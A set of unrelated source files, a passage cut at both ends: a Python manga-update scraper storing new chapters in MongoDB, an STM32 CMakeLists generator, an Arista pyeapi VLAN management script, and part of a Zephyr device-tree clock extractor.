elif "mins" in times[x] or "min" in times[x] or "minutes" in times[x] or "minute" in times[x]:
if int(str(times[x][0:1])) < 60:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
if list_of_chaps:
not_read.extend([list_of_chaps, list_of_chap_links])
# Appending the new chapters into the dictionary
if not_read:
new_document = {
'record_id': not_read[1],
'manga_name': not_read[2],
'manga_chapters': not_read[3],
'img_link_bg': imgs_srcs[0],
'chapter_links': not_read[4]
}
lst_not_read_dicts.append(new_document)
not_read = []
async def find_manga_manganelo(url):
await asyncio.sleep(1)
global not_read
global document_count
global error_urls
page = requests.get(url)
tree = html.fromstring(page.content)
manga = tree.xpath('//div[@class="story-info-right"]/h1//text()')
chap = tree.xpath('//a[@class="chapter-name text-nowrap"]/text()')
dates = tree.xpath('//span[@class="chapter-time text-nowrap"]/text()')
imgs_srcs = tree.xpath('//span[@class="info-image"]/img/@src')
links = tree.xpath('//a[@class="chapter-name text-nowrap"]/@href')
if page.status_code == 200 and manga:
# Cleaning the manga's name
manga_clean = str(manga)[2:-2]
if " " not in manga_clean:
manga_clean += " "
chap_clean = []
# Removing the 'Chapter' word and getting the chapter number
for x in range(0, len(chap)):
if "Chapter" in chap[x]:
start_chapter = chap[x].find("Chapter")
if ":" in chap[x]:
end_line = chap[x].find(":")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
elif " -" in chap[x]:
end_line = chap[x].find(" -")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
else:
chap_clean.append(str(chap[x][start_chapter + 8:]))
else:
chap_clean.append("SC")
# Adding the required manga name and index num into the not_read array
for x in range(0, len(dates)):
if "day" in dates[x] or "days" in dates[x]:
if int(str(dates[x][0:1])) < 2:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "hour" in dates[x] or "hours" in dates[x]:
if int(str(dates[x][0:2])) < 24:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
if int(str(dates[x][0:1])) < 60:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
# Adding the required chapters and their links into array form for MongoDB
list_of_chaps = []
list_of_chap_links = []
for x in range(0, len(dates)):
if "day" in dates[x] or "days" in dates[x]:
if int(str(dates[x][0:1])) < 2:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "hour" in dates[x] or "hours" in dates[x]:
if int(str(dates[x][0:2])) < 24:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
if int(str(dates[x][0:2])) < 60:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
if list_of_chaps:
not_read.extend([list_of_chaps, list_of_chap_links])
# Appending the new chapters into the dictionary
if not_read:
new_document = {
'record_id': not_read[1],
'manga_name': not_read[2],
'manga_chapters': not_read[3],
'img_link_bg': imgs_srcs[0],
'chapter_links': not_read[4]
}
lst_not_read_dicts.append(new_document)
not_read = []
# async def find_manga_reaperzero(url):
# await asyncio.sleep(1)
# global not_read
# global document_count
# global error_urls
#
# page = requests.get(url)
# tree = html.fromstring(page.content)
#
# manga = tree.xpath('//h5[@class="text-highlight"]/text()')
# chap = tree.xpath('//span[@class="text-muted text-sm"]/text()')
# dates = tree.xpath('//a[@class="item-company text-muted h-1x"]/text()')
# imgs_srcs = tree.xpath('//a[@class="media-content"]/@style')
# links = tree.xpath('//a[@class="item-author text-color "]/@href')
#
# if page.status_code == 200 and manga:
# # Preparing image links to upload to DB
# if "reaper" in url:
# if "reaperscans.com" in str(imgs_srcs[0]):
# imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "")
# else:
# imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "https://reaperscans.com")
# imgs_srcs = imgs_srcs.replace(")", "")
# # else:
# # if "zeroscans.com" in str(imgs_srcs[0]):
# # imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "")
# # else:
# # imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "https://zeroscans.com")
# # imgs_srcs = imgs_srcs.replace(")", "")
#
# # Cleaning the manga's name
# manga_clean = str(manga)[4:-4]
#
# if " " not in manga_clean:
# manga_clean += " "
#
# # Adding 'Chapter ' infront of the chapter numbers for method to get the numbers accurately (improv)
# for x in range(0, len(chap)):
# chap[x] = "Chapter " + str(chap[x]).replace("\n", "")
#
# # Removing the 'Chapter' word and getting the chapter number
# chap_clean = []
#
# for x in range(0, len(chap)):
# start_chapter = chap[x].find("Chapter")
# if ":" in chap[x]:
# end_line = chap[x].find(":")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# else:
# chap_clean.append(str(chap[x][start_chapter + 8:]))
#
# if " " in chap_clean[x]:
# chap_clean[x] = chap_clean[x].replace(" ", "")
#
# # Adding the required manga name and index num into the not_read array
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][1:2])) < 2:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][1:2])) < 24:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
#
# # Adding the required chapters and their links into array form for MongoDB
# list_of_chaps = []
# list_of_chap_links = []
#
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][1:2])) < 2:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][1:2])) < 24:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
#
# if list_of_chaps:
# not_read.extend([list_of_chaps, list_of_chap_links])
#
# # Appending the new chapters into the dictionary
# if not_read:
# new_document = {
# 'record_id': not_read[1],
# 'manga_name': not_read[2],
# 'manga_chapters': not_read[3],
# 'img_link_bg': imgs_srcs,
# 'chapter_links': not_read[4]
# }
#
# lst_not_read_dicts.append(new_document)
#
# not_read = []
# async def find_manga_mangaplus(url):
# global not_read
# global document_count
#
# session = AsyncHTMLSession()
# r = await session.get(url)
# manga = r.html.xpath('//div[@class="post-title"]/h1/text()')
# if r.status_code == 200 and manga:
# await r.html.arender(timeout=7000)
#
# chap = r.html.xpath('//li[@class="wp-manga-chapter"]/a/text()')
# dates = r.html.xpath('//span[@class="chapter-release-date"]/i/text()')
# imgs_srcs = r.html.xpath('//div[@class="summary_image"]/a/img/@data-src')
# links = r.html.xpath('//li[@class="wp-manga-chapter"]/a/@href')
#
# if len(manga) >= 2:
# manga_clean = str(manga[1])[7:-20]
# else:
# manga_clean = str(manga)[30:-22]
# # Done just for Lit The Supreme Being which was buggy
#
# # Cleaning the manga's name
# if " " not in manga_clean:
# manga_clean += " "
#
# # Removing the 'Chapter' word and getting the chapter number
# chap_clean = []
#
# for x in range(0, len(chap)):
# chap[x] = str(chap[x])[10:-8]
# start_chapter = chap[x].find("Chapter")
# if ":" in chap[x]:
# end_line = chap[x].find(":")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# elif " -" in chap[x]:
# end_line = chap[x].find(" -")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# else:
# chap_clean.append(str(chap[x][start_chapter + 8:]))
#
# # Adding the required manga name and index num into the not_read array
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][0:1])) < 2:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][0:2])) < 24:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:1])) < 60:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
#
# # Adding the required chapters and their links into array form for MongoDB
# list_of_chaps = []
# list_of_chap_links = []
#
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][0:1])) < 2:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][0:2])) < 24:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
#
# if list_of_chaps:
# not_read.extend([list_of_chaps, list_of_chap_links])
#
# # Appending the new chapters into the dictionary
# if not_read:
# new_document = {
# 'record_id': not_read[1],
# 'manga_name': not_read[2],
# 'manga_chapters': not_read[3],
# 'img_link_bg': imgs_srcs[0],
# 'chapter_links': not_read[4]
# }
#
# lst_not_read_dicts.append(new_document)
#
# not_read = []
# await session.close()
# Function which connects to my database, clears the collection, and updates with new list of of documents
def clear_and_update_database():
# Setting up Config Parser for more security, thanks to @bugnounty
conf_parser = ConfigParser()
conf_parser.read('db_config.ini')
connection_url = conf_parser.get('server', 'connection_url')
db_name = conf_parser.get('server', 'db_name')
col_name = conf_parser.get('server', 'col_name')
# Connect to the MongoDB Database
client = pymongo.MongoClient(connection_url)
my_database = client.get_database(db_name)
my_collection = my_database.get_collection(col_name)
# Clears the Collection
my_collection.delete_many({})
# Inserts many documents (containing new manga releases)
my_collection.insert_many(lst_not_read_dicts)
# Close the connection to the database
client.close()
async def main_manga():
# tasks_mp = []
# url_list = ['https://manhuaplus.com/manga/almighty-master/', 'https://manhuaplus.com/manga/global-martial-arts/',
# 'https://manhuaplus.com/manga/the-great-ruler/', 'https://manhuaplus.com/manga/the-strongest-god-king/',
# 'https://manhuaplus.com/manga/rebirth-of-the-urban-immortal-cultivator/',
# 'https://manhuaplus.com/manga/demon-magic-emperor/', 'https://manhuaplus.com/manga/apotheosis/',
# 'https://manhuaplus.com/manga/battle-through-the-heavens/',
# 'https://manhuaplus.com/manga/peerless-battle-spirit/', 'https://manhuaplus.com/manga/versatile-mage/',
# 'https://manhuaplus.com/manga/tales-of-demons-and-gods/',
# 'https://manhuaplus.com/manga/lit-the-supreme-being/',
# 'https://manhuaplus.com/manga/rebirth-city-deity/']
#
# for link in url_list:
# tasks_mp.append(asyncio.create_task(find_manga_mangaplus(link)))
#
# await asyncio.gather(*tasks_mp)
# url_list = ['https://reaperscans.com/comics/27937-god-of-blackfield',
# 'https://reaperscans.com/comics/316621-the-great-mage-returns-after-4000-years',
# 'https://reaperscans.com/comics/917294-kill-the-hero',
# 'https://reaperscans.com/comics/563929-limit-breaker',
# 'https://reaperscans.com/comics/535459-mercenary-enrollment',
# 'https://reaperscans.com/comics/335355-sss-class-suicide-hunter',
# 'https://reaperscans.com/comics/147221-superhuman-era',
# 'https://reaperscans.com/comics/364640-the-tutorial-is-too-hard',
# 'https://reaperscans.com/comics/326450-the-player-that-cant-level-up',
# 'https://reaperscans.com/comics/276469-strongest-fighter',
# 'https://reaperscans.com/comics/507776-return-of-the-frozen-player',
# 'https://reaperscans.com/comics/585562-arcane-sniper',
# 'https://zeroscans.com/comics/55416-record-of-the-war-god',
# 'https://zeroscans.com/comics/133460-yong-heng-zhi-zun',
# 'https://zeroscans.com/comics/325051-bowblade-spirit',
# 'https://zeroscans.com/comics/188504-second-life-ranker',
# 'https://zeroscans.com/comics/21941-taming-master',
# 'https://zeroscans.com/comics/585998-the-undefeatable-swordsman']
#
# # Reaper Scans | Zero Scans
# for link in url_list:
# tasks_mp.append(asyncio.create_task(find_manga_reaperzero(link)))
tasks_mp = []
# Mangakakalot
url_list = ['https://mangakakalot.com/read-lm7ib158504847850', 'https://mangakakalot.com/read-ox3yk158504833790',
'https://mangakakalot.com/read-zs6sp158504840280', 'https://mangakakalot.com/read-ul6pf158504868718',
'https://mangakakalot.com/read-ep8pm158504835723', 'https://mangakakalot.com/read-ro4rv158504853379',
'https://mangakakalot.com/read-ja7yn158504838124', 'https://mangakakalot.com/read-jc2wf158504842343',
'https://mangakakalot.com/read-rp1kv158504840628', 'https://mangakakalot.com/read-ie2ho158504839970',
'https://mangakakalot.com/read-wx1xd158504840874', 'https://mangakakalot.com/read-od1pe158504845657',
'https://mangakakalot.com/read-ol2fi158504849602', 'https://mangakakalot.com/manga/lo924793',
'https://mangakakalot.com/read-sz0gg158504854945', 'https://mangakakalot.com/read-dl7bc158504854888',
'https://mangakakalot.com/read-yv2vd158504858458', 'https://mangakakalot.com/read-fv5mg158504856152',
'https://mangakakalot.com/read-ts3gp158504833220', 'https://mangakakalot.com/read-ny9yj158504835342',
'https://mangakakalot.com/read-zg1oh158504842553', 'https://mangakakalot.com/read-vg0sa158504844980',
'https://mangakakalot.com/read-gj8eg158504836414', 'https://mangakakalot.com/read-of6id158504884374',
'https://mangakakalot.com/read-jb3vb158504854796', 'https://mangakakalot.com/read-jm4cz158504894339',
'https://mangakakalot.com/read-tv7mr158504845382', 'https://mangakakalot.com/read-cq3sf158504857171',
'https://mangakakalot.com/read-oe6uc158504836571', 'https://mangakakalot.com/read-mo5of158504931270',
'https://mangakakalot.com/read-kh6ab158504854282', 'https://mangakakalot.com/read-rc4ti158504848110',
'https://mangakakalot.com/read-iq9la158504835986', 'https://mangakakalot.com/manga/dy925897',
'https://mangakakalot.com/manga/xo924628', 'https://mangakakalot.com/manga/eo924794',
'https://mangakakalot.com/manga/yl923871', 'https://mangakakalot.com/manga/vi924713',
'https://mangakakalot.com/read-iw9rf158504883256', 'https://mangakakalot.com/read-bo1jc158504861718',
'https://mangakakalot.com/manga/py923734', 'https://mangakakalot.com/manga/ni924461',
'https://mangakakalot.com/manga/xl923012', 'https://mangakakalot.com/read-ts7tt158504943623',
'https://mangakakalot.com/manga/jv925863', 'https://mangakakalot.com/read-fq9iu158504944929',
'https://mangakakalot.com/manga/xv925862', 'https://mangakakalot.com/manga/cc925283',
'https://mangakakalot.com/manga/sw922557', 'https://mangakakalot.com/read-xf9fk158504906020',
'https://mangakakalot.com/read-nz2fb158504821825', 'https://mangakakalot.com/read-rl4cd158504850497',
'https://mangakakalot.com/manga/gi925311', 'https://mangakakalot.com/manga/vf922819',
'https://mangakakalot.com/manga/ks924647', 'https://mangakakalot.com/manga/ph925967',
'https://mangakakalot.com/manga/wb925651', 'https://mangakakalot.com/manga/yx924697']
for link in url_list:
tasks_mp.append(asyncio.create_task(find_manga_mangakakalot(link)))
# Manganelo
url_list = ['https://manganelo.com/manga/xn921310', 'https://manganelo.com/manga/huku267071576897767',
'https://manganelo.com/manga/read_boku_no_hero_academia_manga',
'https://manganelo.com/manga/read_one_punch_man_manga_online_free3',
'https://manganelo.com/manga/black_clover', 'https://manganelo.com/manga/uaxz925974686',
'https://manganelo.com/manga/dnha19771568647794', 'https://manganelo.com/manga/doulou_dalu_manga',
'https://manganelo.com/manga/pn918005', 'https://manganelo.com/manga/ad921253',
'https://manganelo.com/manga/wu_dong_qian_kun', 'https://manganelo.com/manga/jm923526',
'https://manganelo.com/manga/the_wrong_way_to_use_healing_magic',
'https://manganelo.com/manga/lv999_no_murabito', 'https://manganelo.com/manga/tn922327',
'https://manganelo.com/manga/ff919945', 'https://manganelo.com/manga/bl921472',
'https://manganelo.com/manga/legend_of_phoenix', 'https://manganelo.com/manga/spirit_sword_sovereign',
'https://manganelo.com/manga/mushoku_tensei_isekai_ittara_honki_dasu',
'https://manganelo.com/manga/the_legendary_moonlight_sculptor', 'https://manganelo.com/manga/tn921283',
'https://manganelo.com/manga/ijhr296321559609648', 'https://manganelo.com/manga/si923815',
'https://manganelo.com/manga/the_magic_chef_of_ice_and_fire', 'https://manganelo.com/manga/eg919734',
'https://manganelo.com/manga/bb922866', 'https://manganelo.com/manga/pe922745',
'https://manganelo.com/manga/yrlq217991556843654', 'https://manganelo.com/manga/aq920543',
'https://manganelo.com/manga/be922652', 'https://manganelo.com/manga/ra921707',
'https://manganelo.com/manga/ix921032', 'https://manganelo.com/manga/ir920623',
'https://manganelo.com/manga/fk918347', 'https://manganelo.com/manga/zu917722',
'https://manganelo.com/manga/sm917699', 'https://manganelo.com/manga/wo923110',
'https://manganelo.com/manga/rj922755', 'https://manganelo.com/manga/tv922828',
'https://manganelo.com/manga/pd924480', 'https://manganelo.com/manga/martial_peak',
'https://manganelo.com/manga/do918903', 'https://manganelo.com/manga/nidoume_no_jinsei_wo_isekai_de',
'https://manganelo.com/manga/ku920038', 'https://manganelo.com/manga/mq918999',
'https://manganelo.com/manga/lj919175', 'https://manganelo.com/manga/dr_frost',
'https://manganelo.com/manga/gz922893', 'https://manganelo.com/manga/shikkaku_mon_no_saikyou_kenja',
'https://manganelo.com/manga/the_other_world_doesnt_stand_a_chance_against_the_power_of_instant_death',
'https://manganelo.com/manga/tensei_kenja_no_isekai_raifu_daini_no_shokugyo_wo_ete_sekai_saikyou_ni_narimashita',
'https://manganelo.com/manga/ec925329', 'https://manganelo.com/manga/read_doupo_cangqiong_manga',
'https://manganelo.com/manga/pg920736', 'https://manganelo.com/manga/the_great_ruler',
'https://manganelo.com/manga/rx922672', 'https://manganelo.com/manga/vrin278571580265812',
'https://manganelo.com/manga/apotheosis', 'https://manganelo.com/manga/kk921357',
'https://manganelo.com/manga/hyer5231574354229', 'https://manganelo.com/manga/sw923218',
'https://manganelo.com/manga/rx919523', 'https://manganelo.com/manga/uw924618',
'https://manganelo.com/manga/dz919342', 'https://manganelo.com/manga/pe922986',
'https://manganelo.com/manga/pb925700', 'https://manganelo.com/manga/zm924455',
'https://manganelo.com/manga/yong_heng_zhi_zun', 'https://manganelo.com/manga/kg923596',
'https://manganelo.com/manga/jx925356', 'https://manganelo.com/manga/jf921342',
'https://manganelo.com/manga/lg924896', 'https://manganelo.com/manga/fe922634',
'https://manganelo.com/manga/qp925636', 'https://manganelo.com/manga/dq922693',
'https://manganelo.com/manga/rm922554', 'https://manganelo.com/manga/go922760',
'https://manganelo.com/manga/ph925080', 'https://manganelo.com/manga/kj923068',
'https://manganelo.com/manga/rf925407', 'https://manganelo.com/manga/jb924592',
'https://manganelo.com/manga/iu923224', 'https://manganelo.com/manga/ks924647']
for link in url_list:
tasks_mp.append(asyncio.create_task(find_manga_manganelo(link)))
await asyncio.gather(*tasks_mp)
# Main core of the loop to make the program run every x mins
if __name__ == "__main__":
while True:
document_count = 1
try:
# Creating a File Log System
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Starting the search for mangas!\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
asyncio.run(main_manga())
# print(lst_not_read_dicts)
current_time = str(datetime.datetime.now())
output_console = "[" + str(current_time) + "] " + str(lst_not_read_dicts) + "\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
clear_and_update_database()
except Exception as ex:
exception_type, exception_object, exception_traceback = sys.exc_info()
line_no = exception_traceback.tb_lineno
# Adding (an) exception(s) on the log file
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Exception has occured: " + str(line_no) + " - " + str(
ex.args) + " !\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
# time.sleep(5 * 60)
finally:
# Clears the list for next iteration
lst_not_read_dicts = []
# Make the app sleep for x mins before restarting
time.sleep(10 * 60)
# Adding when the sleep timer is over
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Restarting the loop!\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
# Bugs:
# ZeroScans has some problem with the pictures
# ReaperScans has a method to avoid the bot
# ManhuaPlus needs JS loading which causes my instance to crash
#######################################################
# Learning #
#######################################################
# MongoDB stuff:
# import pymongo
# client = pymongo.MongoClient("connection_url")
# db = client.get_database('manga_app')
# table = db.get_collection("manga_app_records")
# collection -> table
# document -> rows
# table.delete_many({})
# print(table.count_documents({}))
# insert a document i.e row insert_one() or insert_many()
# new_row = {
# 'record_id': 3,
# 'manga_name': 'dummy name',
# 'manga_chapters': ['c1', 'c2'],
# 'img_link_bg': 'dummy_link',
# 'chapter_links': ['link1', 'link2']
# }
# table.insert_one(new_row)
# find a document, find() -> returns an iterator, find_one({'keyword': search})
# print(list(table.find({})))
# update, update_one(filter_dict, {'$set': new_dict}) or update_many
# delete, delete_one(filter_dict) or delete_many(filter_dict)
# print(list(table.find({'manga_name': 'dummy name'})))
# table.delete_many({'manga_name': 'dummy name'})
|
the-stack_106_12921
|
from collections import defaultdict
import fnmatch
import logging
import os
from os.path import join, abspath, isfile, dirname, basename
from ._utils import get_template_environment
logger = logging.getLogger(__name__)
class CMakeGenerator:
"""
CMakeList.txt generator for STM32 CubeMX project with makefile.
"""
_GLOB_SOURCES = {'*.c', '*.cpp'}
_REMOVE_GLOB_SOURCES = {'*_template.*'}
_STM_HAL_DRIVER = 'Drivers/STM32*HAL*/Src'
def _process_source_files(self, project_dir, sources):
# split sources by directories
source_dirs = defaultdict(lambda: set())
for source in sources:
source_path = abspath(join(project_dir, source))
if not isfile(source_path):
raise ValueError("Source must contain only files, but it contains {}".format(source))
source_dir = dirname(source)
source_basename = basename(source)
source_dirs[source_dir].add(source_basename)
# try to add some optimization for source directories
optimized_source_dirs = {}
for source_dir, source_files in source_dirs.items():
source_dir_path = join(project_dir, source_dir)
dir_files = {dir_file for dir_file in os.listdir(source_dir_path)
if isfile(join(source_dir_path, dir_file))}
glob_files = {
dir_file for dir_file in dir_files
if any(fnmatch.fnmatch(dir_file, glob_template)
for glob_template in self._GLOB_SOURCES)
}
if glob_files and glob_files.issubset(source_files):
source_info = {
'files': source_files - glob_files,
'globs': self._GLOB_SOURCES
}
else:
source_info = {'files': source_files}
optimized_source_dirs[source_dir] = source_info
# special case for 'Src' directory
optimized_source_dirs['Src'] = {'globs': self._GLOB_SOURCES}
# special case for HAL driver
for source_dir, source_info in optimized_source_dirs.items():
if fnmatch.fnmatch(source_dir, self._STM_HAL_DRIVER):
source_info.pop('files', None)
source_info['globs'] = self._GLOB_SOURCES
source_info['remove_files'] = {
hal_file for hal_file in os.listdir(join(project_dir, source_dir))
if any(fnmatch.fnmatch(hal_file, glob_template)
for glob_template in self._REMOVE_GLOB_SOURCES)
}
break
# split optimized_source_dirs into 3 category
globs = []
remove_files = []
files = []
for source_dir in sorted(optimized_source_dirs):
source_info = optimized_source_dirs[source_dir]
for source_glob in source_info.get('globs', set()):
globs.append('{}/{}'.format(source_dir, source_glob).lstrip('/'))
for source_file in source_info.get('files', set()):
files.append('{}/{}'.format(source_dir, source_file).lstrip('/'))
for source_remove_file in source_info.get('remove_files', set()):
remove_files.append('{}/{}'.format(source_dir, source_remove_file).lstrip('/'))
return globs, remove_files, files
def generate_from_make(self, project_description, cmake_file):
# optimize source file location
source_globs, source_remove_files, source_files = self._process_source_files(
project_dir=project_description.project_dir,
sources=project_description.source_files
)
# render cmakefile
env = get_template_environment()
cmake_template = env.get_template('CmakeLists.txt')
cmake_context = {
'cmake_version': '3.5',
'project': {
'name': project_description.target,
'include_dirs': project_description.include_dirs,
'source': {
'globs': source_globs,
'remove_files': source_remove_files,
'files': source_files
},
'build_dir': project_description.build_dir,
'definitions': project_description.definitions,
'mcu_flags': project_description.mcu_flags,
'optimization_flags': project_description.optimization_flags,
'ld_script': project_description.ld_script
}
}
cmake_file_content = cmake_template.render(cmake_context)
# save cmakefile
with open(cmake_file, 'w', encoding='utf-8') as f:
f.write(cmake_file_content)
def generate_cmake_from_make(project_description, cmake_file):
"""
Generate cmake file.
:param project_description: :class:`ProjectDescription` object
:param cmake_file: cmake file path
"""
CMakeGenerator().generate_from_make(project_description, cmake_file)
|
the-stack_106_12923
|
#!/usr/bin/env python
"""
Using Arista's pyeapi, create a script that allows you to add a VLAN (both the
VLAN ID and the VLAN name). Your script should first check that the VLAN ID is
available and only add the VLAN if it doesn't already exist. Use VLAN IDs
between 100 and 999. You should be able to call the script from the command
line as follows:
python eapi_vlan.py --name blue 100 # add VLAN100, name blue
If you call the script with the --remove option, the VLAN will be removed.
python eapi_vlan.py --remove 100 # remove VLAN100
Once again only remove the VLAN if it exists on the switch. You will probably
want to use Python's argparse to accomplish the argument processing.
"""
from __future__ import unicode_literals, print_function
import pyeapi
import argparse
import six
def pyeapi_result(output):
"""Return the 'result' value from the pyeapi output."""
return output[0]['result']
def check_vlan_exists(eapi_conn, vlan_id):
"""
Check if the given VLAN exists
Return either vlan_name or False
"""
vlan_id = six.text_type(vlan_id)
cmd = 'show vlan id {}'.format(vlan_id)
try:
response = eapi_conn.enable(cmd)
check_vlan = pyeapi_result(response)['vlans']
return check_vlan[vlan_id]['name']
except (pyeapi.eapilib.CommandError, KeyError):
pass
return False
def configure_vlan(eapi_conn, vlan_id, vlan_name=None):
"""
Add the given vlan_id to the switch
Set the vlan_name (if provided)
Note, if the vlan already exists, then this will just set the vlan_name
"""
command_str1 = 'vlan {}'.format(vlan_id)
cmd = [command_str1]
if vlan_name is not None:
command_str2 = 'name {}'.format(vlan_name)
cmd.append(command_str2)
return eapi_conn.config(cmd)
def main():
"""Add/remove vlans from Arista switch in an idempotent manner."""
eapi_conn = pyeapi.connect_to("pynet-sw2")
# Argument parsing
parser = argparse.ArgumentParser(
description="Idempotent addition/removal of VLAN to Arista switch"
)
parser.add_argument("vlan_id", help="VLAN number to create or remove", action="store", type=int)
parser.add_argument(
"--name",
help="Specify VLAN name",
action="store",
dest="vlan_name",
type=str
)
parser.add_argument("--remove", help="Remove the given VLAN ID", action="store_true")
cli_args = parser.parse_args()
vlan_id = cli_args.vlan_id
remove = cli_args.remove
vlan_name = six.text_type(cli_args.vlan_name)
# Check if VLAN already exists
check_vlan = check_vlan_exists(eapi_conn, vlan_id)
# check if action is remove or add
if remove:
if check_vlan:
print("VLAN exists, removing it")
command_str = 'no vlan {}'.format(vlan_id)
eapi_conn.config([command_str])
else:
print("VLAN does not exist, no action required")
else:
if check_vlan:
if vlan_name is not None and check_vlan != vlan_name:
print("VLAN already exists, setting VLAN name")
configure_vlan(eapi_conn, vlan_id, vlan_name)
else:
print("VLAN already exists, no action required")
else:
print("Adding VLAN including vlan_name (if present)")
configure_vlan(eapi_conn, vlan_id, vlan_name)
if __name__ == "__main__":
main()
|
the-stack_106_12925
|
#
# Copyright (c) 2018 Bobby Noelte
#
# SPDX-License-Identifier: Apache-2.0
#
from extract.globals import *
from extract.directive import DTDirective
##
# @brief Manage clocks related directives.
#
# Handles:
# - clocks
# directives.
#
class DTClocks(DTDirective):
def __init__(self):
pass
def _extract_consumer(self, node_address, yaml, clocks, def_label):
clock_consumer = reduced[node_address]
clock_consumer_compat = get_compat(node_address)
clock_consumer_bindings = yaml[clock_consumer_compat]
clock_consumer_label = 'DT_' + get_node_label(node_address)
clock_index = 0
clock_cell_index = 0
nr_clock_cells = 0
clock_provider_node_address = ''
clock_provider = {}
for cell in clocks:
if clock_cell_index == 0:
if cell not in phandles:
raise Exception(
("Could not find the clock provider node {} for clocks"
" = {} in clock consumer node {}. Did you activate"
" the clock node?. Last clock provider: {}.")
.format(str(cell), str(clocks), node_address,
str(clock_provider)))
clock_provider_node_address = phandles[cell]
clock_provider = reduced[clock_provider_node_address]
clock_provider_compat = get_compat(clock_provider_node_address)
clock_provider_bindings = yaml[clock_provider_compat]
clock_provider_label = get_node_label( \
clock_provider_node_address)
nr_clock_cells = int(clock_provider['props'].get(
'#clock-cells', 0))
clock_cells_string = clock_provider_bindings.get(
'cell_string', 'CLOCK')
clock_cells_names = clock_provider_bindings.get(
'#cells', ['ID', 'CELL1', "CELL2", "CELL3"])
clock_cells = []
else:
clock_cells.append(cell)
clock_cell_index += 1
if clock_cell_index > nr_clock_cells:
# clock consumer device - clocks info
#####################################
prop_def = {}
prop_alias = {}
# Legacy clocks definitions by extract_cells
for i, cell in enumerate(clock_cells):
if i >= len(clock_cells_names):
clock_cell_name = 'CELL{}'.format(i)
else:
clock_cell_name = clock_cells_names[i]
if clock_cells_string == clock_cell_name:
clock_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
str(clock_index)])
else:
clock_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
clock_cell_name, str(clock_index)])
prop_def[clock_label] = str(cell)
if clock_index == 0 and \
len(clocks) == (len(clock_cells) + 1):
index = ''
else:
index = str(clock_index)
if node_address in aliases:
if clock_cells_string == clock_cell_name:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cells_string,
index]),
clock_label,
prop_alias)
else:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cells_string,
clock_cell_name,
index]),
clock_label,
prop_alias)
# alias
if i < nr_clock_cells:
# clocks info for first clock
clock_alias_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
clock_cell_name])
prop_alias[clock_alias_label] = clock_label
# Legacy clocks definitions by extract_controller
clock_provider_label_str = clock_provider['props'].get('label',
None)
if clock_provider_label_str is not None:
try:
generation = clock_consumer_bindings['properties'][
'clocks']['generation']
except:
generation = ''
if 'use-prop-name' in generation:
